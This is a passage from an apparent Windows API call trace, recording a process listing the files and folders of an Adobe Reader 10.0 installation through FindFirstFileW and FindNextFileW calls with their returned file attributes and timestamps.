lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IDTemplates", cAlternateFileName="IDTEMP~1")) returned 1 [0215.366] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Javascripts", cAlternateFileName="JAVASC~1")) returned 1 [0215.366] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffc0b80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa6790, dwReserved0=0x0, dwReserved1=0x0, cFileName="JP2KLib.dll", cAlternateFileName="")) returned 1 [0215.367] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Legal", cAlternateFileName="")) returned 1 [0215.367] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d618a80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Locale", cAlternateFileName="")) returned 1 [0215.367] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e1a400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x59de0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logsession.dll", cAlternateFileName="LOGSES~1.DLL")) returned 1 [0215.367] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81df42a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4d1e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LogTransport2.exe", cAlternateFileName="LOGTRA~1.EXE")) returned 1 [0215.367] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d618a80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb9808, dwReserved0=0x0, dwReserved1=0x0, cFileName="Onix32.dll", cAlternateFileName="")) returned 1 [0215.367] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x802e0860, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x14ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFPrevHndlr.dll", cAlternateFileName="PDFPRE~1.DLL")) returned 1 [0215.368] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80541e60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x724ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFSigQFormalRep.pdf", cAlternateFileName="PDFSIG~1.PDF")) returned 1 [0215.368] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80600540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x18dd88, dwReserved0=0x0, dwReserved1=0x0, cFileName="pe.dll", cAlternateFileName="")) returned 1 [0215.368] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x83529920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="piaglbreakfinder.dll", cAlternateFileName="PIAGLB~1.DLL")) returned 1 [0215.368] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ff4900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ff4900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plug_ins", cAlternateFileName="")) returned 1 [0215.368] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7dc322e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7dc322e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plug_ins3d", cAlternateFileName="PLUG_I~1")) returned 1 [0215.369] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="pmd.cer", cAlternateFileName="")) returned 1 [0215.369] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8b98, dwReserved0=0x0, dwReserved1=0x0, cFileName="reader_sl.exe", cAlternateFileName="READER~1.EXE")) returned 1 [0215.369] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dc322e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x21af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="rt3d.dll", cAlternateFileName="")) returned 1 [0215.369] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d5bd20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x44a, dwReserved0=0x0, dwReserved1=0x0, cFileName="RTC.der", cAlternateFileName="")) returned 1 [0215.369] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fe3480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8ff90, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScCore.dll", cAlternateFileName="")) returned 1 [0215.369] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x820095e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x820095e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x820095e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0215.370] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffc0b80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffc0b80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffc0b80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SPPlugins", cAlternateFileName="SPPLUG~1")) returned 1 [0215.370] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d81e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3cd90, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlite.dll", cAlternateFileName="")) returned 1 [0215.370] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801fc020, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8026e440, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8026e440, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tracker", cAlternateFileName="")) returned 1 [0215.370] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x801fc020, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4398, dwReserved0=0x0, dwReserved1=0x0, cFileName="ViewerPS.dll", cAlternateFileName="")) returned 1 [0215.370] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8202f740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x11f98, dwReserved0=0x0, dwReserved1=0x0, cFileName="wow_helper.exe", cAlternateFileName="WOW_HE~1.EXE")) returned 1 [0215.370] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0215.371] FindClose (in: hFindFile=0xb7f590 | out: hFindFile=0xb7f590) returned 1 [0215.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef3c) returned 1 [0215.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef48) returned 1 [0215.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ef7c) returned 1 [0215.371] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader", nBufferLength=0x105, lpBuffer=0x8f6ea84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader", lpFilePart=0x0) returned 0x2f [0215.371] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\", nBufferLength=0x105, lpBuffer=0x8f6ea58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\", lpFilePart=0x0) returned 0x30 [0215.371] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\*", lpFindFileData=0x8f6eca4 | out: lpFindFileData=0x8f6eca4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f590 [0215.371] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.372] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8202f740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x32398, dwReserved0=0x0, dwReserved1=0x0, cFileName="A3DUtils.dll", cAlternateFileName="")) returned 1 [0215.372] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x803069c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xc7d88, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACE.dll", cAlternateFileName="")) returned 1 [0215.372] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d81e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x47f98, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroBroker.exe", cAlternateFileName="ACROBR~1.EXE")) returned 1 [0215.372] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xf798, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrofx32.dll", cAlternateFileName="")) returned 1 [0215.372] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8051bd00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x16a0398, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroRd32.dll", cAlternateFileName="")) returned 1 [0215.373] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13ad98, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroRd32.exe", cAlternateFileName="")) returned 1 [0215.373] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x803069c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x45a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroRd32Info.exe", cAlternateFileName="ACRORD~1.EXE")) returned 1 [0215.373] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e8c820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xbfa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroTextExtractor.exe", cAlternateFileName="ACROTE~1.EXE")) returned 1 [0215.373] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x820095e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe.Reader.Dependencies.manifest", cAlternateFileName="ADOBER~1.MAN")) returned 1 [0215.374] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80541e60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x128fa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.exe", cAlternateFileName="ADOBEC~1.EXE")) returned 1 [0215.374] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7de214c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb8fa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeLinguistic.dll", cAlternateFileName="ADOBEL~1.DLL")) returned 1 [0215.374] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fe3480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x37398, dwReserved0=0x0, dwReserved1=0x0, cFileName="adoberfp.dll", cAlternateFileName="")) returned 1 [0215.374] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x803069c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4a598, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeXMP.dll", cAlternateFileName="")) returned 1 [0215.374] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80352c80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x53f988, dwReserved0=0x0, dwReserved1=0x0, cFileName="AGM.dll", cAlternateFileName="")) returned 1 [0215.375] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8058e120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="AGMGPUOptIn.ini", cAlternateFileName="AGMGPU~1.INI")) returned 1 [0215.375] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8026e440, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x366c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ahclient.dll", cAlternateFileName="")) returned 1 [0215.375] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x802ba700, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, 